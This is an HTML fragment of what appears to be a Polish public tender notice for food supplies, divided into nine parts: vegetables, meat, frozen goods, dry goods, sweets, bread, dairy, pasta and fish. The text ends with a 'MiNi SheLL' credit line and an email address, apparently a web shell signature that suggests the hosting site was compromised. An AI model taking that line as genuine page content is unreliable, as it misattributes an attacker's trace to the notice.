<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Marchew luzem kg 60 Pietruszka korzeń kg50 Rzodkiewka świeża p. pęczek 50 Sałata szt. 50 Sałata lodowa szt.50 Por korzeń kg30 Cebula biała kg80 Buraki czerwone kg40 Seler korzeń kg60 Jabłka lobo kg100 Mandarynki kg80 Kiwi  szt.200 Ziemniaki jadalne kg   2000 Kapusta czerwona świeża  kg 80 Kapusta pekińska  szt. 50 Kalafior świeży  szt.60 Pomidory luz kg   60 Ogórki szklarniowe kg60 Ogórki kwaszone luz kg  50 Kapusta kwaszona kg60  Kapusta biała główka kg kg  40  Pieczarki świeże luz kg40 Banan kg100 Gruszka kg60 Papryka świeża  kg30 Szczypior pęczek100 Koper świeży pęczek100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tabela B  MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Kości od schabu kg 200 Ogonówka wieprzowa wędzona  kg 120 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg80 Szynka wieprzowa wędzona got. kg90 Mięso wieprzowe mielone drobne kg80 Mielonka zapiekana wieprzowa kg80 Mięso gulaszowe wieprzowe kg 100 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg60 Porcje rosołowe z kurczaka kg100  Kiełbasa wieprzowa gruba kg160 Udka z kurczaka kg80 Karkówka b k wieprzowa kg90 Kaszanka kg50 Kurczak świeży patroszony do 2kg kg50 Wątróbka wieprzowa kg60 Parówka drobiowa cienka kg90 Kotlet schabowy b k kg 40 Pasztet drobiowy kg 60 Smalec luz kg30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tabela C  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.50 Truskawki mrożone  2,5  kg op.. szt. 60 Mieszanka warzywna paski 2,5  kg op. szt.80 Brokuły mrożone 2,5  kg op.szt.60 Zupa kalafiorowa, 2,5  kg op.szt.60 Zupa jarzynowa, 2,5  kg op.szt.50 Kalafior, 2,5  kg op.szt.50 Pyzy drożdżowe op.9szt szt.300 Groszek zielony, 2,5  kg op.szt.50 Marchew z groszkiem, 2,5  kg op.szt.50  Wiśnie drążone 2,5  kg op.szt.20 Maliny 2,5 kg szt.20 Jagody 2,5 kg szt.20 Kompotowe 2,5kg op.szt.100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tabela D   PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Cena Mąka pszenna 500 kg150 Ryż długoziarnisty  kg80 Kawa zbożowa (typu inka)150 g szt.20 Kasza jęczmienna średnia luz kg30 Kasza manna 1kg kg20 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.20 Cukier biały kryształ, paczkowany 1kg szt. 500 Syrop wieloowocowy, wysokosłodzony 1l szt. 30 Napoje różne smaki 0.20l kartonik szt. 800 Krem do smarowania orzech.-czek. 230 g szt.100 Miód pszczeli nektarowy lipowy 0,4 kg szt.100 Dżemy różne smaki 0,30 l  wysokosłodzony szt.80 Kakao naturalne 150 g op.szt.10 Majonez dekoracyjny 0,7 kg op. szt.50 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz kg30 Fasola sucha luz kg30 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt. 240 Proszek do pieczenia 18g szt.30 Drożdże piekarskie 100g szt.40 Ketchup łagodny 500g szt.20 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg	szt. 60 Liść laurowy 10g szt.30	Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml szt.40 Przecier ogórkowy 0,5 kg op. szt.30 Cynamon 20 g szt.20 Ziele angielskie 15gszt.30 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l szt.120 Szprot w pomidorach puszka  170g op. szt.60 Paprykarz szczecinecki 135g op. szt.40 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l szt.  200 Imbir 20 g szt.30 Czosnek granulowany 20 g szt.30 Bazylia 10 g szt.30 Oregano 10 g szt.30 herbaty ziołowe 4x30 g - 20 torebek szt.30 ryż ciemny kg30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140  Papryka słodka syp. 0,5kg szt. 2  Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt.10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Tabela E   SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukierki mieszane czekolad 2,5kg op. szt.5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt.10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g	szt. 280  Figurki czekoladowe - Mikołaje 80g szt.300 Wafle śmietankowe luz kg30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tabela F  PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg,litewski krojony szt.400 Bułka firmowa  0,06 kg szt.3500 Bułka maślana 0,05 kg szt.2500 Chleb pszenny 0,35 kg szt.600 Pączki szt.600 Bułka tarta 1 kg szt.40 Babka okrągła średnia 0,5kg szt.120 Drożdżówki szt.500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Tabela G     NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 12% słodka 0,5l  szt.130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op.szt.400 Ser homogenizowany  tłusty 200 g szt.50 Ser salami luzkg60 Sery topione bloczki 100g op. różne smakiszt.180 Jajka kurze świeże średnie szt.2000 Mleko 2% karton 1 l op.szt.1200Krążek mix  typu Hochlland 140g trójkątyszt.80 Ser kanapkowy 150g op.szt.150 Ser królewski luzkg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.50 Jogurt naturalny 0,45l op.szt.50 Jogurt smakowy 115gszt.1200 Śmietanka kremowa 30% 0,5lszt.30Margaryna zwykła 250g szt.220 Masło śmietankowe 200g op. zaw. 86%tł.szt.1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Tabela H   MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sos pieczeniowy 3 kg. op. szt. 5	Majeranek 0,30kg op.szt. 20 Zupa żurek 1 kg. op. szt. 4 Zupa barszcz 1 kg op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op.szt.50 Makaron nitki 100% pszenicy Durum 5kg op.szt.6 Makaron rurki 100% pszenicy Durum 5kg op.szt.40 Makaron koła 100% pszenicy Durum 5kg op.szt.40 Makaron łazanki 100% pszenicy Durum 3kg op. szt.12 Makaron świderki 100% pszenicy Durum 5kg op.szt.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tabela  I   RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg 150 Ryby wiadro płaty śledziowe ocet 2kg.op. kg 30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com